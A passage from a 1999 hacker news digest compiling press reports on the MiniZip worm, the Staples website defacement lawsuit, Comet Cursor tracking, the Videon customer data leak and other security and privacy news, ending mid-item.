      http://www.zdnet.com/zdnn/stories/news/0,4586,2402114,00.html?chkpt=zdnntop
      
      MSNBC
      http://www.msnbc.com/news/341096.asp
      
      Associated Press - via Baltimore Sun
      http://www.sunspot.net/cgi-bin/gx.cgi/AppLogic+FTContentServer?section=cover&pagename=story&storyid=1150180206405
      
      MiniZip a nasty, small clone of ExploreZip

      New virus compresses ExploreZip code to
      evade anti-virus software, bites at least a
      dozen companies.

      By Jim Kerstetter, PC Week
      UPDATED December 1, 1999 9:04 AM PT 

      They call it, MiniZip.

      Virus researchers at Network Associates Inc. (Nasdaq:
      NETA), Symantec Corp. (Nasdaq: SYMC) and Trend
      Micro Inc. warned Tuesday evening that a new version of
      the ExploreZip virus, which wipes out information on a
      hard drive, has hit at least 12 companies so far, six of
      them high-tech manufacturing companies. Several
      thousand PCs are believed to have been hit. 

      The ExploreZip variant, also called ExploreZip.worm.pak,
      is 120KB, about half the size of its predecessor. But 
      other than its diminutive size, MiniZip acts exactly like
      ExploreZip, which wipes out files on hard drives and
      can spread via e-mail. 
      
      Compression conundrum
      MiniZip is so small because the virus's author
      compressed the original ExploreZip code. Compressing it
      changes the bits, meaning that anti-virus software has
      trouble identifying the new virus. MiniZip first appeared
      last week, so most anti-virus makers have updated their
      software to detect its code. While anti-virus makers
      issued notice of the new updates, it appears that many
      companies have not updated their anti-virus software,
      allowing Tuesday's outbreak. 
      
      What to look for
      ExploreZip, the "father" of MiniZip, was first reported on
      June 11. To propagate, the worm uses MAPI-capable
      e-mail programs, such as Microsoft Corp.'s Outlook,
      Outlook Express and Exchange. 
      
      It e-mails itself out as an attachment with the filename
      "zipped_files.exe." The body of the e-mail message looks like
      it came from a regular e-mail correspondent and says:
      
      "I received your email and I shall send you a reply ASAP.
      Till then, take a look at the attached zipped docs."
      
      Once it's launched, MiniZip launches the original
      Worm.ExploreZip routine. It looks for any drives mapped
      to the infected computer and spreads to them. It also
      looks for unread e-mail and automatically replies to them,
      in search of new victims. 
      
      "That's why it has spread so rapidly now, but didn't at first,"
      said Vincent Weafer, director of the Symantec Antivirus
      Research Center. "This is exactly how ExploreZip
      spread."
      
      MiniZip may display an error message informing the user
      that the file is not a valid archive, according to the
      anti-virus companies. The worm copies itself to the
      c:\windows\system directory with the file name
      "Explore.exe" and then modifies the WIN.INI file so that
      the virus launches each time Windows is started.
      
      Associated Press;
      
      Computer virus devouring files


      The Associated Press

      SAN FRANCISCO (AP) � Experts scrambled to warn thousands
      of computer users that a familiar and damaging virus has struck
      scores of companies and could be slumbering in their e-mail inboxes.

      The Mini-Zip virus tore through computers on Tuesday, devouring
      files and crippling e-mail systems, anti-virus analysts said. It was
      expected to renew its assault today as unsuspecting users logged on. 

      Dan Schrader, vice president of new technology at Trend Micro in
      Cupertino, Calif., said he fielded complaints of significant problems
      from four Fortune 500 companies and scores of smaller companies. 

      Sal Viveros, a marketing manager for Santa Clara-based Network
      Associates, which makes anti-virus software, said 20 large
      corporations had been affected by Tuesday evening. 

      The experts refused to release the names of affected companies. 

      Mini-Zip's parent bug, Worm.Explore.Zip, struck last summer. It
      was considered the most destructive virus since the Melissa outbreak
      in the spring. 

      ``The last time this virus came along it affected tens of thousands �
      maybe hundreds of thousands of computers � and caused millions
      of dollars in damage,'' Schrader said. ``It's malicious and
      fast-spreading. We consider this to be high-risk.'' 

      It wasn't clear whether the problem had been reported to the
      government-chartered CERT Coordination Center � formerly the
      Computer Emergency Response Team � at Carnegie Mellon
      University in Pittsburgh. There were no warnings on its Web site
      early today. 

      Anti-virus experts said the bug gets loose from an infected system as
      a seemingly friendly reply to a clean e-mail sent via the Microsoft
      Outlook, Outlook Express or Exchange browsers. 

      The virus intercepts the original message and automatically sends
      itself as a response � even changing the subject line from, for
      example, ``Work Meeting'' to ``Re: Work Meeting.'' 

      The body of the message reads: ``Hi (recipient's name)! I received
      your e-mail and I shall send you an e-mail ASAP. Till then, take a
      look at the attached zipped docs. bye.'' 

      The e-mail contains an attachment called ``zipped�files.exe.'' If a
      user double-clicks on the attachment, the virus is set loose in the new
      victim's system. 

      It then destroys a series of files in a computer's hard drive by
      replacing them with empty files. 

      Anti-virus experts cautioned users against opening e-mails if they do
      not know the sender or why they were sent. They said the virus
      could be fought with updated anti-virus software. 

      Originally published on 12/01/1999 
      
      @HWA      
      
05.0  Staples Files Suit Against Unknown Defacer 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Staples Inc. has filed a lawsuit in US District Court in
      Boston charging that "John Doe," an unidentified cyber
      intruder, illegally accessed the company's Web site and
      damaged the company by stealing e-commerce
      business. The defacement that occurred on October
      9th, featured advertisements for products at Home
      Depot. Staples hope to identify the intruder shortly.
      (How do you sue an unknown person?) 

      Boston Globe
      http://www.globe.com/dailyglobe2/334/business/Staples_files_suit_against_Web_hacker+.shtml
      
      Associated Press       
      http://library.northernlight.com/EB19991130960000057.html?cb=0&dx=1006&sc=0#doc
      
      Staples files suit against Web
      hacker 
 
      By Shelley Murphy, Globe Staff, 11/30/99 
 
          hopping on line may be the best way to avoid holiday crowds, but
          customers visiting Staples's Web site one day last month encountered a
      unique problem when they unwittingly found themselves in a competitor's
      store.
 
      A hacker broke into the Framingham office-supply retailer's Internet site,
      www.staples.com, on Oct. 9 and posted advertisements for one of the
      company's major competitors, Office Depot.
 
      Shoppers clicking on Office Depot products were linked immediately to the
      home page of Staples's major competitor, which is based in Delray Beach,
      Fla.
 
      Officials at Staples Inc. filed a lawsuit in US District Court in Boston
      yesterday charging that ''John Doe,'' the unidentified hacker, illegally accessed
      the company's Web site and damaged the company by stealing e-commerce
      business.
 
      The suit contends that the hacker is believed to live in or near Massachusetts
      and that the company expects to identify him shortly.
 
      ''We consider it highly unlikely that...our competitors were involved in any
      way,'' said Shannon Lapierre, public relations manager of Staples, speculating
      that the changes to the Web site may have been a prank.
 
      But Staples, which just announced third-quarter Internet sales revenue of $24
      million, is taking the Web-site intrusion seriously and is determined to identify
      the culprit and report him to federal authorities, Lapierre said.
 
      Meanwhile, federal authorities have been on the lookout for Internet fraud.
      Federal law prohibits unauthorized access to a computer and calls for as
      much as 10 years in prison if damage is caused recklessly as a result of the
      breach.
 
      ''Obviously e-commerce is a very important part of our business and very
      important to the company,'' said Lapierre. 
 
      Staples's goal is to have 1 million on-line customers and $1 billion in Internet
      sales by 2003, Lapierre said.
 
      Staples, which did $7 billion in sales last year and which operates more than
      1,000 office superstores, launched its Web site a year ago. 
 
      While monitoring the site Oct. 9, officials noticed that products advertised
      throughout the Web site had been deleted and replaced with products bearing
      the Office Depot logo.
 
      The suit said that the Office Depot advertisements contained links to the
      Florida company's Web site, meaning that Staples's shoppers who clicked on
      the illegally advertised products were redirected to the competitor's Web site.
 
      Shoppers were diverted from Staples to Office Depot for about an hour
      before the problem was corrected, Lapierre said.
 
      In addition to lost business, Staples alleges that it cost the company time and
      money to repair its Web site and to determine the extent of the security
      breach. 
 
      Calls to Office Depot, the world's largest seller of office products, were
      referred to the company's vice president of public relations, who couldn't be
      reached for comment late yesterday.
 
      Lapierre said the problems created by the hacker had never happened to
      Staples before. ''It's an interesting time we live in,'' she said.
 
      Staples's stock rose yesterday to close at 23-13/16 in trading on the Nasdaq
      market. Office Depot closed at 11 1/2, down , on the New York Stock
      Exchange.
 
      This story ran on page D01 of the Boston Globe on 11/30/99. 
     � Copyright 1999 Globe Newspaper Company. 
     
     
      Associated Press;
     
     
      Story Filed: Tuesday, November 30, 1999 12:50 PM EDT 
      
      BOSTON (AP) -- Office supply store Staples has filed suit against an
      unnamed hacker who broke into its Internet site and posted 
      advertisements that led Web browsers to the home page of one of its
      chief competitors. 
      
      In the suit filed Monday in U.S. District Court in Boston, 
      Framingham-based Staples charged that the hacker, referred to as
      ``John Doe,'' illegally entered the site and damaged Staples by 
      stealing e-commerce business. 
      
      The suit claims that ``John Doe'' lives in or near Massachusetts, and
      that the company expects to identify him shortly. 
      
      The hacker broke into the Staples Internet site on Oct. 9 and posted
      advertisements for Office Depot. Shoppers who clicked on the Office 
      Depot products were linked to the Office Depot home page. The problem
      was corrected after about an hour. 
      
      In the suit, Staples alleges that, aside from a loss of money, it cost
      time and money to find and fix the security breach. 
      
      Staples officials speculated that changes to the Web page were a prank,
      and discounted the possibility that its competitors were behind it. 
      
      Gary Schweikhart, an Office Depot spokesman, said Tuesday the company 
      was outraged by the computer hack and said Office Depot had no part in
      it. 
      
      ``We're not that dumb and at the same time we would not condone any
      activity that is illegal and unethical,'' he said. 
      
      Federal law calls for a maximum of 10 years in prison if damage is 
      caused as a result of unauthorized access to a computer. 
      
      Staples, which did $7 billion in sales last year, launched its Web site
      a year ago. The company hopes to have 1 million Internet customers and 
      $1 billion in Internet sales by 2003, Lapierre said. 
      
      Copyright � 1999 Associated Press Information Services, all rights reserved.
      
      @HWA
      
06.0  Comet bows to consumer pressure
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Ted 
      
      Yesterday Comet Systems Inc. was accused of
      collecting data on consumers web surfing practices with
      their free cursor changing software. The software
      Comet Cursor, is installed on over 16 million systems and
      tracks web usage of over 60,000 web sites. Following
      rampant consumer outcry over the practice Comet
      Systems has agreed to allow consumers to delete the
      serial number used to track individual web surfing habits
      and will also seek certification from Truste, the industry
      privacy watchdog group. Truste's certification of Comet
      Systems could take 45 to 60 days. 

      Associated Press - via San Jose Mecury News       
      http://www.sjmercury.com/svtech/news/breaking/ap/docs/1137191l.htm
      
      Software firm in privacy flap

      BY TED BRIDIS
      Associated Press Writer 

      WASHINGTON (AP) -- A company that offers free software to change an 
      Internet browser's computer cursor into cartoon characters promised 
      Tuesday to let people delete a serial number the company was using to 
      track customers across the Internet.

      Responding to an outcry over the privacy implications of its software, 
      Comet Systems Inc. also said it will seek certification from Truste, an 
      organization that monitors whether Web sites are following the privacy 
      promises they make to consumers.

      Truste said Comet Systems had ``significantly damaged the trust of their 
      customers.''

      New York-based Comet Systems acknowledged Monday that its cursor software 
      -- used by more than 16 million people -- reports back to its own 
      computers with each customer's unique serial number each time that person 
      visits any of 60,000 Web sites that support its technology.

      Those sites include dozens aimed at young children, such as those for the 
      Dilbert and Peanuts characters of United Feature Syndicate Inc. and the Ty 
      Inc. site for Beanie Babies.

      Comet said it never violated customers' privacy because it does not 
      attempt to match its serial numbers against anyone's real-world identity. 
      But it said Tuesday it will allow customers to delete those numbers, 
      anyway, although the numbers helped Comet keep an accurate census of its 
      customers for marketing and billing purposes. Some Web sites pay Comet 
      based on the number of visitors using the cursor-changing technology.

      Customers will be able to download a program starting Wednesday from 
      Comet's Web site, at www.cometsystems.com, to replace their serial number 
      with a meaningless number that isn't unique.

      ``If that's what we need to do to appease users, we'll do that,'' 
      spokesman Ben Austin said.

      Comet's certification to Truste could take 45 to 60 days. But that 
      organization only monitors data collected at a company's Web site, not by 
      its stand-alone software programs.

      ``We don't cover software privacy practices,'' Truste spokesman David 
      Steer acknowledged Tuesday. ``Comet Systems has realized they have 
      significantly damaged the trust of their customers, and they're looking at 
      ways to rebuild that trust.''

      Critics said earlier that the company should have more openly disclosed 
      the behind-the-scenes transmissions, which are made without warning. They 
      also said it would not be difficult given today's technology to begin 
      correlating the Comet serial number with a consumer's identity if the 
      company suddenly decided to or if Comet -- with its extensive tracking 
      database -- were purchased by new owners willing to do that.

      ``The typical guy who goes to Best Buy and buys a computer and installs 
      this software, he'll never know about this stuff,'' said programmer Dave 
      Gale of Tampa, Fla. ``It's like a toy, but you wouldn't expect a toy to 
      follow you around on the Internet.''

      Steer, the spokesman for Truste, said other companies also undoubtedly are 
      clandestinely monitoring the online behavior of their customers.

      ``I believe there are a lot of other software companies that are 
      collecting personal information and not disclosing it,'' he said. ``That 
      is just no longer acceptable.''

      Internet discussion groups were filled Tuesday with messages from angry 
      people who believed the cursor software did or could violate their 
      privacy.

      In a statement published on the company's Web site, Comet President Jamie 
      Rosen said the company was ``quite surprised'' at the privacy questions 
      because the software doesn't ask for a customer's name, e-mail address or 
      other personal information.

      ``We deeply regret that this has caused concern among our users and we 
      pledge to be a leader in the area of online privacy in the future,'' he 
      said.
      
      @HWA
      
07.0  Personal Info of Canadian ISP Users Leaked 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by Astroboyz and dj.tazz 
      The personal information on almost 2,700 Internet users
      in Manitoba Canada was stolen and spread across the
      Internet. Users of the Videon Wave's Internet cable
      services had thier account numbers, along with
      customer names, addresses, phone numbers, user
      names and passwords stolen. The intrusion into Videon
      systems took place almost two weeks ago however the
      company never notified any of the effected customers.
      The incident has not been reported to the local Police or
      the RCMP. 

      Winnipeg Free Press
      Does anyone have a better link? This one is about to
      expire. 
      
      http://205.200.191.20/cgi-bin/LiveIQue.acgi$rec=3673?search
      
                                                                            
      Hackers tear cover off Videon security

           
      Tue, Nov 30, 1999
     
      By Doug Nairne
     
      Legislature Reporter
     
      PERSONAL INFORMATION on almost 2,700 Videon cable modem customers has been 
      obtained by Internet hackers in what is being called one of the most 
      damaging computer attacks ever against a Manitoba company.

      The information has become a hot property as it is passed around the 
      city's computer underground, while irate customers are demanding to know 
      why Videon didn't notify them that their names, phone numbers and 
      passwords had been taken.

      The list includes 2,688 Videon account numbers, along with customer names, 
      addresses, phone numbers, user names and passwords. 

      Reid Eby, an Internet security consultant and president of Interlink 
      Online Services, said hackers could use the information to access people's 
      Internet accounts and send and receive e-mail as if they were the owner. 
      E-mail that has already been downloaded to a computer is       safe, but 
      all incoming messages can be intercepted. There is no impact on Videon 
      cable TV subscribers, only cable modem users.

      "If they got the user names and passwords, this is the worst incident I've 
      ever heard about locally," Eby said. "Given what is going on with hacking, 
      placing any client information on-line in this day and age is silly." 

      Eby said the Videon information would also be valuable for sale to direct 
      marketers and junk mailers, who would covet the contact data for high-end 
      computer users.

      Anyone who does any business transactions on-line may also be in danger, 
      especially if their credit card numbers are transmitted back to them in a 
      receipt. Hackers could also use the information to "socially engineer" a 
      target, tricking people into revealing more information       about 
      themselves or making their computers vulnerable to intrusion.

      Videon spokeswoman Nadine Delisle said that a routine security sweep last 
      week showed that customer information had been pilfered. She claimed that 
      no passwords were obtained, although lists being circulated clearly 
      include passwords, user names and other information.

      Despite the criminal nature of the intrusion, city police and RCMP said 
      the incident has not been reported to their investigators. 

      Sources say the hack took place during the second week of November, but 
      none of the Videon customers contacted by the Free Press yesterday knew 
      that anything had happened.

      "I'm a little surprised that we were never notified about this," said 
      businessman Sam Katz, whose wife's personal cellular phone number is on 
      the list, along with his other information. "I'd like to think these 
      things are a little bit better secured." 

      Delisle said Videon decided the information wasn't sensitive, so customers 
      were not informed about the security breach. 

      "The risk seemed to be very minimal," she said. "It was not assessed to be 
      important."

      Katz disagreed, saying he plans to find out why he wasn't notified.

      Winnipeg police Const. Bob Johnson said companies often don't report 
      hacking because they are concerned about bad publicity.

      Delisle said the incident was not "serious enough" to report to police.

      "We closed the security hole so that this will not happen again, that was 
      the priority," she said.

      But a spokeswoman with the Canadian Radio-television and 
      Telecommunications Commission said Videon customers can file a complaint 
      against Videon and demand an explanation. 

      "People should be able to get the reasons why their private information 
      was leaked out," she said.

      The customer list contains a wide cross-section of Winnipeggers, including 
      doctors, business people, university professors, journalists and even 
      computer security experts. The hackers say they could pose as any one of 
      the people on the list, although there is no evidence that       anyone 
      has done so yet.

      Hackers contacted said they were particularly pleased to get the personal 
      information of one Videon customer -- a computer security expert who has 
      written articles on the psychology of hackers, describing them as geeks 
      and loners.

      Meanwhile, Ron Campbell, another cable modem customer whose details have 
      been disclosed, said he is upset about the incident but that he doesn't 
      blame Videon for the security breach.

      "I don't particularly think Videon could have stopped this from 
      happening," he said. "I assume they had some security in place."

      PHOTO ILLUSTRATION BY JOE BRYKSA/WINNIPEG FREE PRESS

      Hackers managed to breach Videon's security and gain access to customers' 
      personal files.
      
      @HWA
      
08.0  First Internet Piracy Case in Japan 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by Galleon 
      A 21-year-old student has been accused of illegally
      distributing over 170 titles of game software for
      different Nintendo machines. This is the first case of an
      unauthorized delivery of game software via the Internet
      in Japan. 

      Asia Biz Tech       
      http://www.nikkeibp.asiabiztech.com/wcs/frm/leaf?CID=onair/asabt/news/85776
      
      Hokkaido
      Police Pursue Unauthorized Net Delivery of Game Software 

      December 1,
      1999 (TOKYO) -- The Hokkaido Prefectural Police's Sapporo Kita Station
      alleged that a college student delivered unauthorized game software
      over the Internet.

      It sent papers on Nov. 25, 1999 to the Sapporo District Prosecutor's
      Office for prosecution.

      The 21-year-old student, who has been accused of illegally distributing
      about 180 titles of game software for Family Computer (Famicon) and
      Game Boy game machines made by Nintendo Co., Ltd., is  suspected of
      infringing on rights under the Copyright Law.

      The case is the first disclosure of an unauthorized delivery of game
      software via the Internet in Japan.

      The college student reportedly distributed the software on his own 
      Web page,labeled as "information exchange," to  seem as if the
      delivery did not constitute downloading of game software.

      Game software for sale is usually recorded in read-only memory (ROM).
      The student ran software which emulates a game  machine on a  personal
      computer, and stored the game software recorded in these ROMs on
      a hard disk drive on the PC and uploaded it onto a Web server.

      According to Association for Copyright for Computer Software (ACCS), 
      which assisted the police in the disclosure of the  case, there
      seemed to be a lot of downloading from the  suspect's Web  site, but
      it does not know how many downloads were actually made. 

      An ACCS spokesman said that software distribution without authorization
      of an author itself is unlawful. In addition, the suspect knew
      the case was illegal, intentionally  concealed the  illegal uploading
      and downloading and distributed not just a few software programs over
      the Internet, the spokesman said.

      ACCS assumes there must be many other cases of illegal uploading and
      downloading of game software via the Internet.  The association
      therefore hopes that the disclosure of the  case will serve as a warning
      to the public.

      [Comment by BizTech]
      
      The disclosure of the illegal uploading and downloading of game software
      was based on a "breach of the Copyright Law." However, there  are various
      applications of the Copyright Law depending on the case. In this case, the
      college student was suspected of "infringing on the right of public
      transmission under the Copyright Law."

      "The right of public transmission (Article 23 of the Copyright Law) is an
      author's proprietary right to transmit his or her work to the general public
      via broadcasting and/or communications. For example, an author's authorization
      will be needed for any broadcasting of a work in a television or radio program.
      (Note. In Japan, granting of copyrights and collection of license fees for
      the majority of musical works are performed by the Japanese  Society for
      Rights of Authors, Composers and Publishers (JASRAC).) Distribution of
      works over the Internet is included in the public transmission right.
      Distribution of any software and musical data over the Internet shall constitute
      infringement on the public transmission right and thus breaches the Copyright Law.
      (Note. Any case which constitutes "reference" under the Copyright Law
      shall be excluded from this case.)

      For example, if someone transforms Celine Dion's hit number, "My heart will go
      on," into MIDI data without obtaining Dion's permission and  plays the song
      on his or her own Web site as background music, strictly speaking such
      an act would constitute infringement or the public transmission right.

      (Note: Any works whose copyright is obviously expired shall be  excluded from
      this case. For  example, any distribution of MIDI data of   well-known  works 
      such as a composition  made by Mozart,  Beethoven or  Chopin, is generally 
      legal.)
      
      In this case, the college student uploaded game software on a Web server
      without  obtaining authorization of the authors of the game software, and
      enabled  anybody who can access the Web site to download the software
      programs. This is called "enabling of public transmission." The case infringes
      on the public transmission  right.

      In addition to infringing on the public transmission right, the suspected
      student also breached the Copyright Law for uploading of the game software on
      the Web server because the student made unauthorized copies of software
      (Infringement on the reproduction right, Article 21 of the Copyright Law).

      In the case, the suspect made unauthorized copies when copying the game software
      from ROMs to the hard disk drive of his or her PC and when copying it from
      the hard disk drive to a hard drive on the Web server. Because of the suspect's
      ultimate objective was to distribute of software over the Internet, the
      case does not constitute a "reproduction for private use" under Article 30
      of the Copyright Law, and thus breaches the Copyright Law. The suspect repeatedly
      breached more than one provision of the Copyright Law, even though the other
      breaches were not disclosed.

      (Kazumi Tanaka, Deputy Editor, BizTech News Dept.)
      
      @HWA


09.0  FBI Launches InfraGuard in Ohio 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      A national program known as InfraGuard, developed by
      the FBI to promote information sharing among law
      enforcement, industry, the academic community and the
      public about computer network intrusions and computer
      system vulnerabilities, was officially launched in Ohio
      yesterday. Over 200 people where expected at the
      kickoff meeting. (Watch for an exclusive insiders report
      on InfraGuard coming soon to HNN.) 

      The Cincinnati Post 
      http://www.cincypost.com/news/hacker112999.html
      
      C I N C I N N A T I   P O S T

 
      FBI leads new effort to help
      thwart hackers
 
      Post staff report
 
      Nearly 200 people were expected at today's kickoff
      meeting of a group organized by the FBI to thwart
      hackers from breaking into government, industry and
      academic computer systems in Cincinnati and southern
      Ohio.
 
      Speakers included Cincinnati FBI agent in charge
      Sheri Farrar, Southern Ohio U.S. Attorney Sharon
      Zealey, Ohio Bureau of Criminal Identification and
      Investigation Superintendent Ted Almay and
      representatives from the FBI's National Infrastructure
      Protection Center.
 
      The regional meeting, held at Deer Creek State Park
      in Pickaway County, is part of a national program
      developed by the FBI and industry to promote
      information sharing among law enforcement, industry,
      the academic community and the public about
      computer network hacking and computer system
      vulnerabilities.
 
      So-called ''InfraGard'' chapters are designed to help
      protect the nation's information systems from cyber
      and physical threats. The Cincinnati FBI's chapter
      includes the 48 southern-most Ohio counties, including
      Cincinnati, Dayton and Columbus.
 
      A national InfraGard program was developed after
      President Clinton directed the FBI to identify and
      coordinate computer infrastructure protection experts
      inside and outside the federal government.
 
      Members of the Cincinnati chapter include the Ohio
      Supercomputer Center, American Electric Power,
      Ohio State University and Bank One.
 
      Members eventually will have access to an Alert
      Network that will allow them to use encryption
      technology to report attacks on their computer
      systems to the FBI. The FBI will provide what it calls
      a ''sanitized'' description of the incident, without
      identifying the source of the report, to other chapter
      members so they can take actions to protect their own
      systems.
 
      Members also will have access to an InfraGard Web
      site being created by the FBI that will provide timely
      information about computer protection issues.
 
      Target: Hackers
 
      InfraGard is seeking more regional chapter members
      from telecommunications, banking, energy and
      transportation industries, as well as from academic
      institutions, hospitals and government agencies.
 
      For more information, call Cincinnati FBI agent
      Roger Wilson at (513) 421-4310.
 
      Publication date: 11-29-99
      
      @HWA
      
10.0  National Gun Database Goes Online 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      A national gun database, Online Lead, was activated
      Tuesday at all 331 branches of the Treasury
      Department's Bureau of Alcohol, Tobacco and Firearms.
      The system is available to police and other local law
      enforcement officials through ATF offices. The database
      included the gun's make and serial number, and the
      complete chain of sale from manufacturer to wholesaler
      or distributor to the first retail sale by a federally
      licensed gun dealer. Officials have said that security
      measures to protect the database from malicious
      intruders has been taken but did not elaborate. 

      Associated Press      
      http://library.northernlight.com/EB19991130720000025.html?cb=0&dx=1006&sc=0#doc
      
      Story Filed: Tuesday, November 30, 1999 11:44 AM EDT 

      WASHINGTON (AP) -- Federal and local law enforcement officials are getting 
      a new high-tech tool to fight crime: a nationwide computer system that 
      aims to trace guns used during crimes. 

      The system, called Online Lead, is administered by the Treasury 
      Department's Bureau of Alcohol, Tobacco and Firearms and has been 
      operating on a limited trial basis since February. 

      ``Online Lead takes our fight against gun traffickers into cyberspace,'' 
      said Treasury Secretary Lawrence Summers, who made the announcement today. 
      ``It gives federal, state and local law enforcement officials throughout 
      the country a new tool to help identify       and arrest gun 
      traffickers.'' 

      Starting today the computer system is operating full time and is widely 
      available. Specifically, the system is in use at all 331 ATF field 
      offices. Although police and other local law enforcement officials can't 
      tap directly into the system on their own, they can access       the 
      system through ATF. 

      Local law enforcement officials are encouraged but not required to ask ATF 
      to trace guns used during crimes. The results of those traces are entered 
      into a growing national database, which now has information on more than 1 
      million traced firearms. 

      ATF has been tracing guns used in crimes for years, but the sophisticated 
      software used in the new online system should make it much easier for 
      investigators to analyze trends and patterns in illegal firearms 
      trafficking, law enforcement officials said. For police       and other 
      local law enforcers, the system may provide new leads and additional 
      information about crimes, they said. 

      Online Lead is updated frequently and provides information on a traced gun 
      one day after it is completed. 

      The new system evolved from earlier projects that aim to provide 
      investigators access to data on guns used in crimes. Those systems stored 
      information on traced guns on computer discs that had to be shipped to ATF 
      field offices, a slow process. The new       online system gives law 
      enforcers fast access to such information. 

      Information about all firearms traced by the ATF goes into the national 
      database and is available on the new online system. What agents can trace 
      is limited. They start with a gun's make and serial number, moving forward 
      from the manufacturer to a wholesaler       and distributor to the first 
      retail sale by a federally licensed gun dealer. 

      All sales by licensed dealers must be recorded, and those records must be 
      made available to ATF. But any sales by individuals or by collectors at 
      gun shows, for example, are considered private and exempt from such 
      record-keeping requirements. 

      Copyright � 1999 Associated Press Information Services, all rights reserved.
      
      
      @HWA
      
11.0  Zero Knowledge Ships Freedom, Finally 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Jordan 
      After what seemed like an agonizingly long beta period
      Zero Knowledge Systems has finally shipped Freedom
      1.0. Freedom works seamlessly alongside your favorite
      browser and other Internet applications. You can surf
      the web, send email, chat, telnet, and participate in
      newsgroups as you normally would, only now with
      complete confidence that your personal information is
      not being collected without your consent. Freedom
      identifies you on the net with a 'nym' that you choose.
      There can be only one 'nym' so unless you want
      something like 'Tom4538720' you should reserve yours
      today. 

      Freedom 1.0       
      http://www.zks.net/clickthrough/click.asp?partner_id=542
      
      @HWA
      
12.0  OpenBSD 2.6 Ships 
      ~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Theo 
      What is probably the most secure operating system
      available has shipped its new version. OpenBSD 2.6 is a
      FREE, multi-platform 4.4BSD-based UNIX-like operating
      system. It emphasizes portability, standardization,
      correctness, proactive security and integrated
      cryptography. Some of the new features include the
      addition of ssh (OpenSSH) and Perl 5.005_03 to the
      base system, reliability patches for the PowerPC port,
      improved support for ext2fs, USB support, a faster
      install process and a lot more. 

      OpenBSD       
      http://www.openbsd.org/
      
      @HWA
      
13.0  Videon Was Warned of Data Loss 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by dj.tazz and P_Simm 
      The Canadian ISP, Videon, was warned that it had left
      its customer database available on the web for all to
      see. Days later, after the database had made the
      rounds on the net the security issue was resolved.
      Customers however where never notified by the
      company. They did not find out about the problem until
      weeks later when it appeared in the local newspaper.
      Videon has confirmed that they received the emailed
      warning and failed to act in a timely manner to prevent
      the loss of customer account numbers, names,
      addresses, phone numbers, user names and passwords. 

      Winnipeg Free Press       
      http://205.200.191.20/cgi-bin/LiveIQue.acgi$rec=3772?search
      
      Videon ignored Web security breach
     
      E-mail warning of leak never received reply
     
     
      Wed, Dec 1, 1999
     
      By Doug Nairne
     
      Legislature Reporter
     
      VIDEON WAS warned that its cable modem customer list was left unprotected 
      on the Internet but failed to act for at least a day, allowing hackers a 
      chance to pilfer the sensitive information, the Free Press has learned.

      An e-mail message identifying the security leak was sent to Videon 
      security staff on Nov. 10, which is thought to be the day prior to when 
      personal details on about 2,700 people were downloaded.

      A man who asked to be identified only by his computer user name, "Grub," 
      said he sent the warning after stumbling on the customer data base while 
      surfing the Videon Web site. 

      Despite Videon's insistence that the information was taken after a 
      "deliberate attack," Grub said he found it sitting out in the open where 
      anyone could have seen it. 

      "When I found this I thought, 'Holy smokes, I can't believe this is up 
      there,' " he said. "They might as well have written out the list and taped 
      it to the front door." 

      Grub said he e-mailed Videon warning them of the problem but never 
      received a reply.

      "They make it sound like a big computer attack, but it was probably just 
      their own stupidity," he said.

      Sometime later, the list was discovered by someone else and copies began 
      to be made. According to Videon, customer names, addresses and phone 
      numbers have been posted to an Internet chat group, where it would be 
      widely accessible.

      Videon spokeswoman Nadine Delisle confirmed that Videon received the 
      warning e-mail. She said that a combination of bad judgment by staff and 
      the Remembrance Day holiday resulted in the message initially being 
      ignored.

      "At the time it was not perceived to be a big risk," she said. "In 
      retrospect, that may have been an error in judgment."

      Hackers ended up getting what they describe as a gold-mine of information, 
      including account numbers, names, addresses, phone numbers, user names and 
      passwords. They say the information can be used to intercept people's 
      e-mail or to assume someone else's identity       on the Internet.

      After playing down the security leak Monday, Videon was scrambling to deal 
      with the crisis yesterday. Senior executives and communications staff were 
      in emergency meetings most of the day. 

      Delisle said Videon was planning a massive e-mail broadcast to all its 
      cable modem customers to inform them of the incident, and will provide 
      instructions on how to take precautions like changing passwords.

      She said Videon also wants to reassure people that their billing 
      information and credit card numbers were not revealed.

      An internal investigation is being carried out, and an outside firm will 
      be brought in to do a full security audit, Delisle said.

      About a dozen angry customers called the Free Press yesterday, most 
      wanting to know why Videon didn't tell anyone what had happened -- 
      including the police -- until yesterday, more than two weeks after they 
      found out the information was taken.

      While passwords can be quickly changed, other information like addresses 
      and phone numbers are also being passed around, leaving people vulnerable.

      One woman, who asked not to be identified, said she is outraged that she 
      was not told her information had been downloaded.

      "Anyone with a computer may be able to get my name and phone number, and 
      address," she said. "My daughter won't be playing outside alone anytime 
      soon, because now I won't know if some pervert has gotten my address and 
      is lurking around my house." 

      The woman said she is considering cancelling her account.

      Delisle said that in retrospect the decision to keep the incident quiet 
      may not have been the right one.

      "We're still piecing together all the details of what happened," she said. 
      "The important thing is that this does not happen again."

      Videon will set up a Web site to help customers at www.videon.ca/secure 
      and also plans to take out ads in Winnipeg newspapers to explain what 
      happened. 

      Videon customers have set up at least one other site with instructions on 
      changing passwords. After being on-line for only 90 minutes, the site had 
      29 hits.
      
      @HWA
      
14.0  German Digital Signature Chip Broke 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by cripto 
      After months of intense lobbying for a secure system
      and only days after being ratified by the European Union
      the German Digital Signature has been broken. The
      digital signature card, developed by Siemens, is to be
      used in cashless payment systems and access control
